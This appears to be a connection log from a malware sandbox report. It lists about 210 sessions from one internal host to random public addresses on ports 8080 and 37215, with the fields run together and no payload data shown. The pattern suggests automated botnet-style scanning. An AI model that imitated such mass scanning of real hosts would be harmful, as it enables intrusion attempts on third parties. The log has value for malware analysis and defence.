                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31477192.168.2.234599061.32.116.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31478192.168.2.2358414184.120.195.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31479192.168.2.234758237.61.26.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31480192.168.2.2336624143.10.216.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31481192.168.2.235058296.39.48.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31482192.168.2.233877618.81.88.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31483192.168.2.2351700184.140.2.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31484192.168.2.2339018202.242.110.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31485192.168.2.2353642195.22.209.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31486192.168.2.234407824.46.142.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31487192.168.2.234234441.149.14.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31488192.168.2.2355892122.243.254.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31489192.168.2.2354264190.206.175.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31490192.168.2.2337630139.27.90.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31491192.168.2.233931231.121.92.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31492192.168.2.23471461.63.106.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31493192.168.2.2345196153.111.177.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31494192.168.2.2352924161.234.81.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31495192.168.2.233755612.232.172.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31496192.168.2.2357192148.132.103.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31497192.168.2.234182669.9.55.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31498192.168.2.235988885.212.174.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31499192.168.2.2342490104.90.93.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31500192.168.2.234493881.7.157.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31501192.168.2.2338844190.244.165.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31502192.168.2.2337788212.182.56.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31503192.168.2.2354222159.206.61.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31504192.168.2.235708096.134.132.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31505192.168.2.234626258.8.35.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31506192.168.2.2339998185.108.165.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31507192.168.2.2334234179.5.203.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31508192.168.2.2342768137.237.248.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31509192.168.2.2351034220.228.33.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31510192.168.2.2352804108.158.232.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31511192.168.2.235496225.158.174.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31512192.168.2.234352486.90.89.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31513192.168.2.2352702142.27.133.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31514192.168.2.234193876.105.249.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31515192.168.2.234287268.107.103.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31516192.168.2.2356234100.159.196.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31517192.168.2.2356538170.99.156.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31518192.168.2.234326035.202.115.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31519192.168.2.2351510204.242.69.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31520192.168.2.2337322176.240.192.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31521192.168.2.234152485.101.58.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31522192.168.2.2348456213.102.40.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31523192.168.2.2334922217.224.207.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31524192.168.2.235483876.100.248.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31525192.168.2.2335662184.29.12.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31526192.168.2.2353666162.182.215.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31527192.168.2.235104276.240.31.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31528192.168.2.234338895.15.196.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31529192.168.2.2336348144.182.104.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31530192.168.2.2348184182.56.213.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31531192.168.2.2358526187.48.107.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31532192.168.2.235444237.22.88.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31533192.168.2.2352502142.205.31.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31534192.168.2.2358522101.159.200.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31535192.168.2.2356068115.107.102.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31536192.168.2.2350726107.118.112.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31537192.168.2.234772698.138.61.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31538192.168.2.2344428184.87.75.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31539192.168.2.2351748114.30.85.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31540192.168.2.234028018.46.157.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31541192.168.2.2347462205.123.210.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31542192.168.2.233547647.232.127.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31543192.168.2.234187240.192.115.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31544192.168.2.2334454179.41.24.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31545192.168.2.2354542172.119.210.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31546192.168.2.235633027.216.222.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31547192.168.2.2359152138.72.37.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31548192.168.2.2342600217.195.245.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31549192.168.2.2339412181.167.22.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31550192.168.2.2344330162.118.44.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31551192.168.2.234451468.115.168.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31552192.168.2.23407681.47.73.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31553192.168.2.23401941.184.108.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31554192.168.2.23370288.230.250.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31555192.168.2.2352784148.210.75.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31556192.168.2.234988237.113.160.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31557192.168.2.234183668.30.183.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31558192.168.2.234616675.84.10.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31559192.168.2.2339592150.130.21.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31560192.168.2.2356562121.222.19.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31561192.168.2.2349624181.122.140.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31562192.168.2.2340644140.29.145.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31563192.168.2.23572242.116.124.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31564192.168.2.2357838219.2.182.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31565192.168.2.2344660155.255.143.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31566192.168.2.2358894197.77.105.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31567192.168.2.235201827.254.2.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31568192.168.2.2352122183.123.193.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31569192.168.2.2347768190.9.171.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31570192.168.2.2340286176.176.192.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31571192.168.2.2349728125.91.67.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31572192.168.2.2333398203.194.186.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31573192.168.2.2338922203.215.179.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31574192.168.2.2356404143.255.113.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31575192.168.2.2336946116.120.141.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31576192.168.2.235979673.78.205.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31577192.168.2.235479837.88.51.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31578192.168.2.2337472131.242.156.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31579192.168.2.2346394220.69.12.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31580192.168.2.2342388163.177.83.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31581192.168.2.234484614.171.210.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31582192.168.2.2348564130.144.55.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31583192.168.2.2336036217.8.244.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31584192.168.2.2335646196.128.101.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31585192.168.2.2357484135.30.151.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31586192.168.2.235416827.9.87.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31587192.168.2.2347516108.223.63.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31588192.168.2.2341158211.24.174.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31589192.168.2.234661897.38.159.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31590192.168.2.2340872221.230.215.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31591192.168.2.2357776126.105.171.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31592192.168.2.2335768198.140.33.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31593192.168.2.2347496118.129.91.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31594192.168.2.2349922151.130.49.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31595192.168.2.2342970197.21.171.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31596192.168.2.234891041.177.76.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31597192.168.2.2350328157.229.183.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31598192.168.2.2358998168.146.237.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31599192.168.2.2360068159.201.226.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31600192.168.2.2338956197.28.9.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31601192.168.2.234090850.170.152.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31602192.168.2.2336828157.33.29.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31603192.168.2.2359154157.14.216.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31604192.168.2.2348218157.20.219.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31605192.168.2.234017860.36.228.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31606192.168.2.2343760106.93.6.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31607192.168.2.2333550189.60.76.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31608192.168.2.2346654146.19.216.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31609192.168.2.2357366172.185.182.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31610192.168.2.2337650131.168.97.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31611192.168.2.233623098.69.31.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31612192.168.2.235423487.109.93.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31613192.168.2.2354024207.26.162.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31614192.168.2.2336318163.120.91.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31615192.168.2.2341348101.28.45.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31616192.168.2.2333298180.194.210.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31617192.168.2.233700436.107.177.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31618192.168.2.2333482123.186.102.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31619192.168.2.2334362192.188.87.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31620192.168.2.234734073.246.58.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31621192.168.2.234402068.6.112.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31622192.168.2.2334024103.142.111.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31623192.168.2.2342428156.81.132.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31624192.168.2.235613076.112.218.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31625192.168.2.235075634.174.60.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31626192.168.2.2336024206.172.153.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31627192.168.2.2359462126.132.204.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31628192.168.2.235666885.99.108.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31629192.168.2.234340217.175.7.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31630192.168.2.2357540181.58.97.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31631192.168.2.233528041.203.195.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31632192.168.2.23336325.116.71.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31633192.168.2.2342690160.35.113.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31634192.168.2.2335206121.193.139.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31635192.168.2.2351510160.193.61.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31636192.168.2.233607891.204.125.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31637192.168.2.234832819.56.30.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31638192.168.2.235875225.157.166.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31639192.168.2.2338604141.84.104.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31640192.168.2.2351510108.29.148.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31641192.168.2.2353172111.207.29.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31642192.168.2.2354482219.41.36.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31643192.168.2.235250259.162.137.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31644192.168.2.2344322195.116.83.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31645192.168.2.2332992142.62.34.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31646192.168.2.2333680111.108.52.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31647192.168.2.233380439.156.126.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31648192.168.2.2342820134.192.129.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31649192.168.2.2352958218.97.163.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31650192.168.2.2334948153.147.205.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31651192.168.2.2341564199.188.113.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31652192.168.2.2338332132.64.182.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31653192.168.2.2358070157.212.132.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31654192.168.2.2344216110.245.32.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31655192.168.2.2342566164.142.59.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31656192.168.2.2359762125.86.29.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31657192.168.2.233836881.157.201.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31658192.168.2.2355596132.156.44.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31659192.168.2.2343004185.3.110.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31660192.168.2.2348068134.118.20.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31661192.168.2.2333888145.64.22.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31662192.168.2.233820092.47.192.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31663192.168.2.2332812107.3.252.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31664192.168.2.2358832157.170.26.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31665192.168.2.235926872.24.220.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31666192.168.2.2356118104.178.226.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31667192.168.2.233877292.7.17.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31668192.168.2.2343164181.236.100.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31669192.168.2.233785496.88.170.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31670192.168.2.2352158220.116.195.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31671192.168.2.235698290.98.5.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31672192.168.2.235255448.49.153.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31673192.168.2.2339994121.96.214.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31674192.168.2.2333316201.237.20.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31675192.168.2.2360866202.183.81.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31676192.168.2.233651447.30.137.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31677192.168.2.2346252128.212.100.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31678192.168.2.2343564216.199.40.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31679192.168.2.2333764144.166.53.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31680192.168.2.2357938151.133.208.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31681192.168.2.2336278176.19.245.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31682192.168.2.233316088.149.154.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31683192.168.2.236010849.187.71.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31684192.168.2.235623247.98.31.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31685192.168.2.2360000216.159.23.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31686192.168.2.2360046156.4.17.538080
                                                        TimestampBytes transferredDirectionData


